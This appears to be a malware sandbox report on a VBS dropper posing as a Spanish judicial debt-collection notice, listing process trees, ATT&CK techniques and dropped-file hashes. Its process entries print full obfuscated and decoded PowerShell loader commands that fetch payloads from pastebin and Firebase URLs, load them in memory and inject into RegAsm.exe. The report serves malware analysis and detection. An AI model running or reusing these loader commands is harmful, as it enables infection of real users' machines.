  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bp☆G0☆e☆B5☆Hk☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆HE☆ZgBk☆G8☆eg☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBW☆Dk☆eQ☆1☆FE☆NQB2☆HY☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆egBj☆GQ☆cgB6☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆egBj☆GQ☆cgB6☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆x☆GE☆Mg☆5☆GQ☆OQ☆3☆GI☆NgBm☆Dg☆NQ☆t☆GY☆ZQ☆x☆Dk☆LQBm☆Dc☆Ng☆0☆C0☆Yw☆3☆GM☆Nw☆t☆Dc☆N☆Bi☆GI☆Zg☆1☆DE☆M☆☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆LgBh☆Gk☆c☆Bv☆EM☆M☆☆y☆CU☆bwB2☆Gk☆a☆Bj☆HI☆QQ☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆Lg☆0☆D☆☆M☆Bk☆GE☆LQBv☆HY☆ZQB1☆G4☆LwBi☆C8☆M☆B2☆C8☆bQBv☆GM☆LgBz☆Gk☆c☆Bh☆GU☆b☆Bn☆G8☆bwBn☆C4☆ZQBn☆GE☆cgBv☆HQ☆cwBl☆HM☆YQBi☆GU☆cgBp☆GY☆Lw☆v☆Do☆cwBw☆HQ☆d☆Bo☆Cc☆I☆☆s☆C☆☆J☆Bx☆GY☆Z☆Bv☆Ho☆I☆☆s☆C☆☆JwBD☆G8☆bwBr☆Gk☆ZQBX☆Gk☆bg☆z☆DI☆LgBl☆Hg☆ZQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆LQ☆t☆C0☆LQ☆t☆C0☆LQ☆n☆Cw☆I☆☆k☆Gk☆bQB4☆Hk☆eQ☆s☆C☆☆Jw☆x☆Cc☆L☆☆g☆Cc☆UgBv☆GQ☆YQ☆n☆C☆☆KQ☆p☆Ds☆';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00.vbs');powershell $KByHL;
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:920
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$imxyy = '0';$qfdoz = 'C:\Users\Admin\Downloads\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/V9y5Q5vv';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $zcdrz = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($zcdrz).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('1a29d97b6f85-fe19-f764-c7c7-74bbf510=nekot&aidem=tla?txt.aipoC02%ovihcrA/o/moc.topsppa.400da-oveun/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $qfdoz , 'CookieWin32.exe____________________________________________-------', $imxyy, '1', 'Roda' ));"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4660
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3156

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00.vbs"
1⤵
- Checks computer location settings
PID:2380
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bp☆G0☆e☆B5☆Hk☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆HE☆ZgBk☆G8☆eg☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBW☆Dk☆eQ☆1☆FE☆NQB2☆HY☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆egBj☆GQ☆cgB6☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆egBj☆GQ☆cgB6☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆x☆GE☆Mg☆5☆GQ☆OQ☆3☆GI☆NgBm☆Dg☆NQ☆t☆GY☆ZQ☆x☆Dk☆LQBm☆Dc☆Ng☆0☆C0☆Yw☆3☆GM☆Nw☆t☆Dc☆N☆Bi☆GI☆Zg☆1☆DE☆M☆☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆LgBh☆Gk☆c☆Bv☆EM☆M☆☆y☆CU☆bwB2☆Gk☆a☆Bj☆HI☆QQ☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆Lg☆0☆D☆☆M☆Bk☆GE☆LQBv☆HY☆ZQB1☆G4☆LwBi☆C8☆M☆B2☆C8☆bQBv☆GM☆LgBz☆Gk☆c☆Bh☆GU☆b☆Bn☆G8☆bwBn☆C4☆ZQBn☆GE☆cgBv☆HQ☆cwBl☆HM☆YQBi☆GU☆cgBp☆GY☆Lw☆v☆Do☆cwBw☆HQ☆d☆Bo☆Cc☆I☆☆s☆C☆☆J☆Bx☆GY☆Z☆Bv☆Ho☆I☆☆s☆C☆☆JwBD☆G8☆bwBr☆Gk☆ZQBX☆Gk☆bg☆z☆DI☆LgBl☆Hg☆ZQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆LQ☆t☆C0☆LQ☆t☆C0☆LQ☆n☆Cw☆I☆☆k☆Gk☆bQB4☆Hk☆eQ☆s☆C☆☆Jw☆x☆Cc☆L☆☆g☆Cc☆UgBv☆GQ☆YQ☆n☆C☆☆KQ☆p☆Ds☆';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00.vbs');powershell $KByHL;
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3220
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$imxyy = '0';$qfdoz = 'C:\Users\Admin\Downloads\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/V9y5Q5vv';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $zcdrz = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($zcdrz).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('1a29d97b6f85-fe19-f764-c7c7-74bbf510=nekot&aidem=tla?txt.aipoC02%ovihcrA/o/moc.topsppa.400da-oveun/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $qfdoz , 'CookieWin32.exe____________________________________________-------', $imxyy, '1', 'Roda' ));"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3576
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3604

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
f41839a3fe2888c8b3050197bc9a0a05

SHA1
0798941aaf7a53a11ea9ed589752890aee069729

SHA256
224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

SHA512
2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

Filesize
425B

MD5
4eaca4566b22b01cd3bc115b9b0b2196

SHA1
e743e0792c19f71740416e7b3c061d9f1336bf94

SHA256
34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

SHA512
bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ff63763eedb406987ced076e36ec9acf

SHA1
16365aa97cd1a115412f8ae436d5d4e9be5f7b5d

SHA256
8f460e8b7a67f0c65b7248961a7c71146c9e7a19772b193972b486dbf05b8e4c

SHA512
ce90336169c8b2de249d4faea2519bf7c3df48ae9d77cdf471dd5dbd8e8542d47d9348080a098074aa63c255890850ee3b80ddb8eef8384919fdca3bb9371d9f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
2783c40400a8912a79cfd383da731086

SHA1
001a131fe399c30973089e18358818090ca81789

SHA256
331fa67da5f67bbb42794c3aeab8f7819f35347460ffb352ccc914e0373a22c5

SHA512
b7c7d3aa966ad39a86aae02479649d74dcbf29d9cb3a7ff8b9b2354ea60704da55f5c0df803fd0a7191170a8e72fdd5eacfa1a739d7a74e390a7b74bdced1685

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
797B

MD5
84237e24e5239264c6e286ccda798aee

SHA1
9bbb215c1f6cda10309b2ca4448afe19b969b312

SHA256
461cc96fe3ef6606ce14e703656bb3b3bb4ea1922b4f0342fac33ddf05f04728

SHA512
6392118487f4dd5bef8768da27e7e875d50ef4e531375a84fd6839f64735f5f8c22d03b9369d7745847f2a2dc09a3b265113e1276aa9d92110b6fab1a33f26e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
80f7f2a6855777ca303ec4705b4ad556

SHA1
870cb3216f15c9087d4bbb4b659fee3513e54ec9

SHA256
7bf15f1dd883a54de32a5e780fa7376235cf11a9a99e1bd9223230d01c0207cc

SHA512
736866e13e3e71e3f376e9aa2835543bc06418852963fbe47150648d485350f8259f89d312f25b1cfd938595ebe02735fa5ca5df43c3421e0dc7429c099a5eac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
96add9818bc0881f0e91f507826327d3

SHA1
f75271093783dea94212d7e66dc858319ff0945b

SHA256
2eb71c04b72ce92b56f479b28dc4dadf2678243d8dfd2be9264445c86629d777

SHA512
9dc1b6f3960f5b41c36b0993746b5380d24779ebbddc8b80c559781ecbac83063c6db1e71d32fb45412db086be625cd8a2a244836b1070e8777a38189761cf74

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
8f6cc4f925812ea0b16c9f25b3c55c16

SHA1
e376d8e91e06d89bf2fc7a892cdca9d1f5c7c706

SHA256
e5478c7ed0b4494fa5f79eedbb1c84dfe25fa3d9724353ae4ef030dbbf39fd43

SHA512
2e42f39ea67f053e535413586f0454de14a6245b706bc7e4c01f0715d1cfc11d1998dd78733135b7885fb07aa1f89135482b3cad021b4f63584c4d1354a0cf72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
ab67dd1c963e04aa74aecb9390a760e8

SHA1
2d592b8c52039e2e524056557c0cc9c8d3fe6f70

SHA256
e9cda90a0fcddec0455b5db951623d100ac7dfba07e33add9a93986b25e9bf14

SHA512
28e05cc4849dfe2ce2c4846d78f6e13d235cea6fb3bd73b753c9629ea1bce3e6f7bffc909b30a895ca22ee256af9e29f580f91c8871dd479e4c94f1913754d8b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
be99bfb5e4a7d43342e6a3087e7cc58c

SHA1
85be09a4148ceb54781edd689200d2e6cf29449e

SHA256
9340c5d240468970a0c685067e72cedf801ff6e04e941423dee3c9e69da5619d

SHA512
30fb7580724a4c3ac3db0ea5214c7c3237825862080048ba65966857aaf4bc199d51bf5e31e1683771ebdf678d5c9210a6d56c5bcdeb705baf2be9f15b35da48

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b8dc7faa83176428daffaf42d97a729f

SHA1
b1bcd193d9b7663a7e1f62ad3d87cad82ff24881

SHA256
6852ff8779c2df850fcc33c3e1004e204d072b1dce607660b9100f2be2c1d33e

SHA512
be43b7f8c2db75bddcf5415e0bc19eeb0a519085f8c2418241b24e8645a3caae7815897a8ea97f9167988b9a1672d90173b26fcb759a0f0f48c5cf6b165bd9a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zkax5qiv.t5e.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00.rar

Filesize
8KB

MD5
1c594335e9f74e316752d771b3c75c5a

SHA1
66188087201e9c29784d2ae1ce53863d31a582df

SHA256
1448a19b3480fa995f507282392c07d4b204d70d6ea7854e00dd5b9f8fb05ff1

SHA512
a80c1c9cbefaaa1be47c1d0df7afa5489a7e41c2575478a8ea205947088359cf0a44f4f9f8b1fd73c66543ecad5ef0fc21404ed891d41746ed31855b9417f6c3

Download Submit
C:\Users\Admin\Downloads\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00\RAD 20017-60-76123- 2024-00923-00; AVISO SOBRE COBRO JUDICIAL, PROCEDE EMBARGO; RAD 20017-60-76123- 2024-00923-00.vbs

Filesize
1.1MB

MD5
92c30eab8732e7ff467cdc530431f09f

SHA1
375f54fad6feca9a61eb138c0586e2f639481269

SHA256
876aca4eeada930057e4a30ad0ba0189829e7ac97440b8f7e77db07863662ff6

SHA512
44b4b94c38b09b57087954d5050c7df657b3c26c17233530217dc1694caadf153caf4717830da6de10b5ca4a4aade6552ca5d83695953693d3bd6866993dee1a

Download Submit
memory/3600-165-0x0000027876F50000-0x0000027876F5A000-memory.dmp

Filesize
40KB

Download
memory/3600-164-0x0000027876F40000-0x0000027876F4A000-memory.dmp

Filesize
40KB

Download
memory/4752-166-0x0000000000400000-0x000000000041A000-memory.dmp

Filesize
104KB

Download
memory/4800-145-0x000001B0D1BE0000-0x000001B0D1C02000-memory.dmp

Filesize
136KB

Download